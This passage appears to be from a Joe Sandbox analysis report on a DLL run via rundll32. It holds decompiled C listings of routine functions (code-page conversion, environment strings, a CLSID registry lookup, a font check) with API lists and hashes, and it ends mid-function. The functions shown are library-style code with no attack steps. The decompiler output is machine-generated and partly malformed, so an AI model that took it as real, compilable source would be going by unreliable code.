                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 833315621-0
                                                                                                            • Opcode ID: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
                                                                                                            • Instruction ID: 07bae71fa05b1da8482edcdebb19160d7d4844d0efed804ca524429d20d1f7a4
                                                                                                            • Opcode Fuzzy Hash: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
                                                                                                            • Instruction Fuzzy Hash: D14190359007199FDB12DFA5C889BBEB7F5FF14751F10011DF102AA1A2CB74AA81CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001A487 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 169COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E1001A487(void* __ebx, void* __edi, int __esi, void* __eflags) {
				intOrPtr _t54;
				int _t56;
				char* _t57;
				int _t68;
				char* _t69;
				int _t70;
				int _t73;
				void* _t77;
				int _t81;
				short* _t82;
				void* _t97;
				short* _t98;

				_t94 = __esi;
				_push(0x38);
				_push(0x10042f10);
				E10012514(__ebx, __edi, __esi);
				_t54 =  *0x1004c470; // 0x6edecb8c
				 *((intOrPtr*)(_t97 - 0x1c)) = _t54;
				 *(_t97 - 0x34) = 0;
				 *(_t97 - 0x44) = 0;
				_t81 =  *( *(_t97 + 0x14));
				 *(_t97 - 0x40) = _t81;
				 *(_t97 - 0x3c) = 0;
				_t56 =  *(_t97 + 8);
				if(_t56 ==  *(_t97 + 0xc)) {
					_t82 =  *(_t97 - 0x48);
					goto L31;
				} else {
					_t85 = _t97 - 0x30;
					if(GetCPInfo(_t56, _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1 && GetCPInfo( *(_t97 + 0xc), _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1) {
						 *(_t97 - 0x3c) = 1;
					}
					if( *(_t97 - 0x3c) == 0) {
						_t94 =  *(_t97 - 0x38);
					} else {
						if(_t81 == 0xffffffff) {
							_t77 = E10011820( *(_t97 + 0x10));
							_pop(_t85);
							_t94 = _t77 + 1;
							__eflags = _t94;
						} else {
							_t94 = _t81;
						}
						 *(_t97 - 0x38) = _t94;
					}
					if( *(_t97 - 0x3c) != 0) {
						L14:
						 *(_t97 - 4) = 0;
						E10010B20(_t94 + _t94 + 0x00000003 & 0xfffffffc, _t85);
						 *(_t97 - 0x18) = _t98;
						_t82 = _t98;
						 *(_t97 - 0x48) = _t82;
						E10011C50(_t82, 0, _t94 + _t94);
						 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
						_t111 = _t82;
						if(_t82 != 0) {
							L19:
							_t68 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10),  *(_t97 - 0x40), _t82, _t94);
							__eflags = _t68;
							if(_t68 == 0) {
								L31:
								__eflags =  *(_t97 - 0x44);
								if(__eflags != 0) {
									_push(_t82);
									E100107C8(_t82, 0, _t94, __eflags);
								}
								_t57 =  *(_t97 - 0x34);
								goto L34;
							}
							__eflags =  *(_t97 + 0x18);
							if( *(_t97 + 0x18) == 0) {
								__eflags =  *(_t97 - 0x3c);
								if(__eflags != 0) {
									L25:
									_push(_t94);
									_push(1);
									_t69 = E1001382A(_t82, 0, _t94, __eflags);
									 *(_t97 - 0x34) = _t69;
									__eflags = _t69;
									if(_t69 != 0) {
										_t70 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, _t69, _t94, 0, 0);
										__eflags = _t70;
										if(__eflags != 0) {
											__eflags =  *(_t97 - 0x40) - 0xffffffff;
											if( *(_t97 - 0x40) != 0xffffffff) {
												 *( *(_t97 + 0x14)) = _t70;
											}
										} else {
											_push( *(_t97 - 0x34));
											E100107C8(_t82, 0, _t94, __eflags);
											 *(_t97 - 0x34) = 0;
										}
									}
									goto L31;
								}
								_t94 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, 0, 0, 0, 0);
								__eflags = _t94;
								if(__eflags == 0) {
									goto L31;
								}
								goto L25;
							}
							_t73 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94,  *(_t97 + 0x18),  *(_t97 + 0x1c), 0, 0);
							__eflags = _t73;
							if(_t73 != 0) {
								 *(_t97 - 0x34) =  *(_t97 + 0x18);
							}
							goto L31;
						} else {
							_push(_t94);
							_push(2);
							_t82 = E1001382A(_t82, 0, _t94, _t111);
							if(_t82 != 0) {
								 *(_t97 - 0x44) = 1;
								goto L19;
							}
							goto L17;
						}
					} else {
						_t94 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10), _t81, 0, 0);
						 *(_t97 - 0x38) = _t94;
						if(_t94 == 0) {
							L17:
							_t57 = 0;
							L34:
							return E1001254F(E100117AE(_t57,  *((intOrPtr*)(_t97 - 0x1c))));
						}
						goto L14;
					}
				}
			}















                                                                                                            0x1001a487
                                                                                                            0x1001a487
                                                                                                            0x1001a489
                                                                                                            0x1001a48e
                                                                                                            0x1001a493
                                                                                                            0x1001a498
                                                                                                            0x1001a49d
                                                                                                            0x1001a4a0
                                                                                                            0x1001a4a6
                                                                                                            0x1001a4a8
                                                                                                            0x1001a4ab
                                                                                                            0x1001a4ae
                                                                                                            0x1001a4b4
                                                                                                            0x1001a62d
                                                                                                            0x00000000
                                                                                                            0x1001a4ba
                                                                                                            0x1001a4ba
                                                                                                            0x1001a4c9
                                                                                                            0x1001a4e4
                                                                                                            0x1001a4e4
                                                                                                            0x1001a4ee
                                                                                                            0x1001a50a
                                                                                                            0x1001a4f0
                                                                                                            0x1001a4f3
                                                                                                            0x1001a4fc
                                                                                                            0x1001a501
                                                                                                            0x1001a504
                                                                                                            0x1001a504
                                                                                                            0x1001a4f5
                                                                                                            0x1001a4f5
                                                                                                            0x1001a4f5
                                                                                                            0x1001a505
                                                                                                            0x1001a505
                                                                                                            0x1001a510
                                                                                                            0x1001a52c
                                                                                                            0x1001a52c
                                                                                                            0x1001a538
                                                                                                            0x1001a53d
                                                                                                            0x1001a540
                                                                                                            0x1001a542
                                                                                                            0x1001a54b
                                                                                                            0x1001a553
                                                                                                            0x1001a570
                                                                                                            0x1001a572
                                                                                                            0x1001a592
                                                                                                            0x1001a59f
                                                                                                            0x1001a5a5
                                                                                                            0x1001a5a7
                                                                                                            0x1001a630
                                                                                                            0x1001a630
                                                                                                            0x1001a633
                                                                                                            0x1001a635
                                                                                                            0x1001a636
                                                                                                            0x1001a63b
                                                                                                            0x1001a63c
                                                                                                            0x00000000
                                                                                                            0x1001a63c
                                                                                                            0x1001a5ad
                                                                                                            0x1001a5b0
                                                                                                            0x1001a5d2
                                                                                                            0x1001a5d5
                                                                                                            0x1001a5ed
                                                                                                            0x1001a5ed
                                                                                                            0x1001a5ee
                                                                                                            0x1001a5f0
                                                                                                            0x1001a5f7
                                                                                                            0x1001a5fa
                                                                                                            0x1001a5fc
                                                                                                            0x1001a608
                                                                                                            0x1001a60e
                                                                                                            0x1001a610
                                                                                                            0x1001a620
                                                                                                            0x1001a624
                                                                                                            0x1001a629
                                                                                                            0x1001a629
                                                                                                            0x1001a612
                                                                                                            0x1001a612
                                                                                                            0x1001a615
                                                                                                            0x1001a61b
                                                                                                            0x1001a61b
                                                                                                            0x1001a610
                                                                                                            0x00000000
                                                                                                            0x1001a5fc
                                                                                                            0x1001a5e7
                                                                                                            0x1001a5e9
                                                                                                            0x1001a5eb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001a5eb
                                                                                                            0x1001a5c0
                                                                                                            0x1001a5c6
                                                                                                            0x1001a5c8
                                                                                                            0x1001a5cd
                                                                                                            0x1001a5cd
                                                                                                            0x00000000
                                                                                                            0x1001a574
                                                                                                            0x1001a574
                                                                                                            0x1001a575
                                                                                                            0x1001a57e
                                                                                                            0x1001a582
                                                                                                            0x1001a58b
                                                                                                            0x00000000
                                                                                                            0x1001a58b
                                                                                                            0x00000000
                                                                                                            0x1001a582
                                                                                                            0x1001a512
                                                                                                            0x1001a523
                                                                                                            0x1001a525
                                                                                                            0x1001a52a
                                                                                                            0x1001a584
                                                                                                            0x1001a584
                                                                                                            0x1001a63f
                                                                                                            0x1001a64f
                                                                                                            0x1001a64f
                                                                                                            0x00000000
                                                                                                            0x1001a52a
                                                                                                            0x1001a510

                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(00000000,?,10042F10,00000038,100185C0,?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020), ref: 1001A4C5
                                                                                                            • GetCPInfo.KERNEL32(00000000,00000001), ref: 1001A4D8
                                                                                                            • _strlen.LIBCMT ref: 1001A4FC
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,10012C1E,?,00000000,00000000), ref: 1001A51D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Info$ByteCharMultiWide_strlen
                                                                                                            • String ID: @hvpYv
                                                                                                            • API String ID: 1335377746-2766943729
                                                                                                            • Opcode ID: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                                                            • Instruction ID: 70101fa7554b3a37292e61141452f95f373fba0d19c42cfe0f4ebf6b77a3f96e
                                                                                                            • Opcode Fuzzy Hash: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                                                            • Instruction Fuzzy Hash: 99514671900619ABDF21CFA5DC84D9EBBF9FF867A0B24411AF814AA190D7309DC1CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001666B Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 131COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E1001666B() {
				int _v4;
				int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t7;
				CHAR* _t8;
				WCHAR* _t16;
				int _t19;
				char* _t23;
				int _t24;
				long _t28;
				int _t29;
				void* _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				CHAR* _t37;
				intOrPtr _t38;
				int _t40;

				_t7 =  *0x1004f700; // 0x1
				_t29 = 0;
				_t36 = 0;
				_t38 = 2;
				if(_t7 != 0) {
					L6:
					__eflags = _t7 - 1;
					if(__eflags != 0) {
						__eflags = _t7 - _t38;
						if(_t7 == _t38) {
							L21:
							_t8 = GetEnvironmentStrings();
							_t37 = _t8;
							__eflags = _t37 - _t29;
							if(_t37 == _t29) {
								L20:
								return 0;
							}
							__eflags =  *_t37 - _t29;
							if( *_t37 == _t29) {
								L25:
								_t39 = _t8 - _t37 + 1;
								_t34 = E100107B6(_t8 - _t37 + 1);
								__eflags = _t34 - _t29;
								if(_t34 != _t29) {
									E10011440(_t34, _t37, _t39);
								} else {
									_t34 = 0;
								}
								FreeEnvironmentStringsA(_t37);
								return _t34;
							} else {
								goto L23;
							}
							do {
								do {
									L23:
									_t8 =  &(_t8[1]);
									__eflags =  *_t8 - _t29;
								} while ( *_t8 != _t29);
								_t8 =  &(_t8[1]);
								__eflags =  *_t8 - _t29;
							} while ( *_t8 != _t29);
							goto L25;
						}
						__eflags = _t7 - _t29;
						if(_t7 == _t29) {
							goto L21;
						}
						goto L20;
					}
					L7:
					if(_t36 != _t29) {
						L9:
						_t16 = _t36;
						if( *_t36 == _t29) {
							L12:
							_t35 = __imp__WideCharToMultiByte; // 0x76ec6840
							_t19 = (_t16 - _t36 >> 1) + 1;
							_v4 = _t19;
							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
							if(_t40 != _t29) {
								_t23 = E100107B6(_t40);
								_v8 = _t23;
								if(_t23 != _t29) {
									_t24 = WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29);
									_t52 = _t24;
									if(_t24 == 0) {
										_push(_v8);
										E100107C8(_t29, _t35, _t36, _t52);
										_v8 = _t29;
									}
									_t29 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t36);
							return _t29;
						} else {
							goto L10;
						}
						do {
							do {
								L10:
								_t16 = _t16 + _t38;
							} while ( *_t16 != _t29);
							_t16 = _t16 + _t38;
						} while ( *_t16 != _t29);
						goto L12;
					}
					_t36 = GetEnvironmentStringsW();
					if(_t36 == _t29) {
						goto L20;
					}
					goto L9;
				}
				_t36 = GetEnvironmentStringsW();
				if(_t36 == 0) {
					_t28 = GetLastError();
					__eflags = _t28 - 0x78;
					if(_t28 != 0x78) {
						_t7 =  *0x1004f700; // 0x1
					} else {
						_t7 = _t38;
						 *0x1004f700 = _t7;
					}
					goto L6;
				} else {
					 *0x1004f700 = 1;
					goto L7;
				}
			}























                                                                                                            0x1001666d
                                                                                                            0x1001667c
                                                                                                            0x1001667e
                                                                                                            0x10016684
                                                                                                            0x10016685
                                                                                                            0x100166b4
                                                                                                            0x100166b4
                                                                                                            0x100166b7
                                                                                                            0x10016736
                                                                                                            0x10016738
                                                                                                            0x10016742
                                                                                                            0x10016742
                                                                                                            0x10016748
                                                                                                            0x1001674a
                                                                                                            0x1001674c
                                                                                                            0x1001673e
                                                                                                            0x00000000
                                                                                                            0x1001673e
                                                                                                            0x1001674e
                                                                                                            0x10016750
                                                                                                            0x1001675c
                                                                                                            0x1001675f
                                                                                                            0x10016767
                                                                                                            0x10016769
                                                                                                            0x1001676c
                                                                                                            0x10016775
                                                                                                            0x1001676e
                                                                                                            0x1001676e
                                                                                                            0x1001676e
                                                                                                            0x1001677e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016752
                                                                                                            0x10016752
                                                                                                            0x10016752
                                                                                                            0x10016752
                                                                                                            0x10016753
                                                                                                            0x10016753
                                                                                                            0x10016757
                                                                                                            0x10016758
                                                                                                            0x10016758
                                                                                                            0x00000000
                                                                                                            0x10016752
                                                                                                            0x1001673a
                                                                                                            0x1001673c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001673c
                                                                                                            0x100166b9
                                                                                                            0x100166bb
                                                                                                            0x100166c5
                                                                                                            0x100166c8
                                                                                                            0x100166ca
                                                                                                            0x100166da
                                                                                                            0x100166da
                                                                                                            0x100166e8
                                                                                                            0x100166ed
                                                                                                            0x100166f3
                                                                                                            0x100166f7
                                                                                                            0x100166fa
                                                                                                            0x10016702
                                                                                                            0x10016706
                                                                                                            0x10016713
                                                                                                            0x10016715
                                                                                                            0x10016717
                                                                                                            0x10016719
                                                                                                            0x1001671d
                                                                                                            0x10016723
                                                                                                            0x10016723
                                                                                                            0x10016727
                                                                                                            0x10016727
                                                                                                            0x10016706
                                                                                                            0x1001672c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100166cc
                                                                                                            0x100166cc
                                                                                                            0x100166cc
                                                                                                            0x100166cc
                                                                                                            0x100166ce
                                                                                                            0x100166d3
                                                                                                            0x100166d5
                                                                                                            0x00000000
                                                                                                            0x100166cc
                                                                                                            0x100166bf
                                                                                                            0x100166c3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100166c3
                                                                                                            0x10016689
                                                                                                            0x1001668d
                                                                                                            0x1001669b
                                                                                                            0x100166a1
                                                                                                            0x100166a4
                                                                                                            0x100166af
                                                                                                            0x100166a6
                                                                                                            0x100166a6
                                                                                                            0x100166a8
                                                                                                            0x100166a8
                                                                                                            0x00000000
                                                                                                            0x1001668f
                                                                                                            0x1001668f
                                                                                                            0x00000000
                                                                                                            0x1001668f

                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001669B
                                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                                                            • GetEnvironmentStrings.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016742
                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 1001677E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 883850110-4125583295
                                                                                                            • Opcode ID: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                                                            • Instruction ID: 9752ab07c098c977bc575d501e7eaa0deb9efe59c3b15e47417eb48d6ecdcefd
                                                                                                            • Opcode Fuzzy Hash: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                                                            • Instruction Fuzzy Hash: 7831A5B260D26A6FE311EF654CC882BBADCEB4E1D8712092DF681CB191D671DCC496A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002583A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 68registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E1002583A(void* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				int _v16;
				char* _v20;
				int _v24;
				void* __ebx;
				void* __edi;
				signed int _t35;
				void* _t37;
				void* _t42;
				int* _t43;

				_t43 = 0;
				_v12 = 0;
				_v20 = E100017D0(_a8, 0x104);
				_v16 = 0x104;
				_t42 = RegOpenKeyA;
				_v24 = 0;
				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
					_push(_t37);
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
							_t35 = RegQueryValueExA(_a4, 0x1003da51, 0,  &_v24, _v20,  &_v16);
							asm("sbb esi, esi");
							_t43 =  ~_t35 + 1;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
					_pop(_t37);
				}
				E10006CE2(_t37, _a8, _t42, 0xffffffff);
				return _t43;
			}














                                                                                                            0x1002584a
                                                                                                            0x1002584d
                                                                                                            0x10025855
                                                                                                            0x10025861
                                                                                                            0x10025864
                                                                                                            0x1002586f
                                                                                                            0x10025876
                                                                                                            0x10025878
                                                                                                            0x10025880
                                                                                                            0x10025890
                                                                                                            0x1002589e
                                                                                                            0x100258a5
                                                                                                            0x100258bb
                                                                                                            0x100258c8
                                                                                                            0x100258ca
                                                                                                            0x100258cb
                                                                                                            0x100258cb
                                                                                                            0x100258d0
                                                                                                            0x100258d0
                                                                                                            0x100258d5
                                                                                                            0x100258d7
                                                                                                            0x100258d7
                                                                                                            0x100258dd
                                                                                                            0x100258e7

                                                                                                            APIs
                                                                                                            • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                                                            • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                                                            • RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                                                            • RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen$QueryValue
                                                                                                            • String ID: CLSID$InProcServer32
                                                                                                            • API String ID: 3523390698-323508013
                                                                                                            • Opcode ID: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                                                            • Instruction ID: 98c4733b419a9a9fcc8d3b331f1c0e54a211d8c73680194401ba1897b1518396
                                                                                                            • Opcode Fuzzy Hash: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                                                            • Instruction Fuzzy Hash: A511297680012DBFEF02EFA5CC80DEEBBB9EF446A0F114122FA05A6150D7719B51DBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10036531 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10036531() {
				struct HWND__* _v4;
				void* _v68;
				void* _v76;
				int _t4;
				int _t10;
				struct HDC__* _t15;
				void* _t18;

				_t4 =  *0x1004b8cc; // 0xffffffff
				if(_t4 == 0xffffffff) {
					_t15 = GetDC(0);
					_v4 = 0;
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_v68 = SelectObject(_t15, _t18);
					}
					GetCharWidthA(_t15, 0x36, 0x36, 0x1004b8cc);
					if(_t18 != 0) {
						SelectObject(_t15, _v76);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t15);
					_t10 =  *0x1004b8cc; // 0xffffffff
					return _t10;
				}
				return _t4;
			}










                                                                                                            0x10036532
                                                                                                            0x1003653a
                                                                                                            0x10036561
                                                                                                            0x10036563
                                                                                                            0x1003657a
                                                                                                            0x1003657e
                                                                                                            0x10036584
                                                                                                            0x10036584
                                                                                                            0x10036592
                                                                                                            0x1003659a
                                                                                                            0x100365a1
                                                                                                            0x100365a4
                                                                                                            0x100365a4
                                                                                                            0x100365ac
                                                                                                            0x100365b2
                                                                                                            0x00000000
                                                                                                            0x100365ba
                                                                                                            0x100365bc

                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 10036543
                                                                                                            • GetSystemMetrics.USER32 ref: 10036567
                                                                                                            • CreateFontA.GDI32(00000000,?,?,?,?,?,10036A10,?,?,?,?,?,?,?), ref: 1003656E
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 10036582
                                                                                                            • GetCharWidthA.GDI32(00000000,00000036,00000036,1004B8CC), ref: 10036592
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 100365A1
                                                                                                            • DeleteObject.GDI32(00000000), ref: 100365A4
                                                                                                            • ReleaseDC.USER32 ref: 100365AC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                                                            • String ID: Marlett
                                                                                                            • API String ID: 1397664628-3688754224
                                                                                                            • Opcode ID: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
                                                                                                            • Instruction ID: 1088ce7175f154466d6028c012866e6bff604f09a65bd199e6d5657c5750c08b
                                                                                                            • Opcode Fuzzy Hash: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
                                                                                                            • Instruction Fuzzy Hash: 5D014071542634BFE2269B668C8CD9B7FACEF467E5F104518F209DA152CB614900CBB4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1003982F Relevance: 15.2, APIs: 10, Instructions: 181memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E1003982F(void* __ecx) {
				intOrPtr _t52;
				intOrPtr _t53;
				void* _t57;
				CHAR* _t60;
				CHAR* _t88;
				CHAR* _t89;
				void* _t102;
				CHAR* _t103;
				CHAR* _t105;
				CHAR* _t106;
				CHAR* _t107;
				void* _t111;
				short* _t112;
				void* _t122;
				void* _t127;
				void* _t129;
				void* _t131;

				_t127 = _t129 - 0x8c;
				_t52 =  *0x1004c470; // 0x6edecb8c
				 *((intOrPtr*)(_t127 + 0x88)) = _t52;
				_t53 =  *0x1004b0a0(_t111, _t122, _t102);
				_t112 =  *((intOrPtr*)(_t127 + 0x94));
				 *((intOrPtr*)(_t127 - 0x7c)) = _t53;
				E10011C50(_t112, 0, 0x20);
				_t103 =  *(_t127 + 0x98);
				_t131 = _t129 - 0x10c + 0xc;
				_t109 = _t103;
				 *(_t127 - 0x80) = _t127 - 0x78;
				if(E100244DE(_t103, 0x100410f8) == 0) {
					_t109 = _t103;
					_t57 = E100244DE(_t103, 0x1003d114);
					_push(0x100);
					_push(_t127 - 0x78);
					if(_t57 == 0) {
						_push(0xf108);
						E100245D3();
						 *_t112 = 0xf108;
						L12:
						_t60 = 0;
						if( *(_t127 - 0x80) == 0) {
							L14:
							__imp__#2(_t60);
							 *(_t112 + 8) = _t60;
							if( *(_t112 + 4) == 0) {
								_t106 =  *(E100373B5() + 0x10);
								if(_t106 != 0) {
									_t115 = lstrlenA(_t106) + 1;
									E10010B20(lstrlenA(_t106) + 0x00000001 + lstrlenA(_t106) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E100067FA(_t131, _t106, _t115,  *((intOrPtr*)(_t127 - 0x7c)));
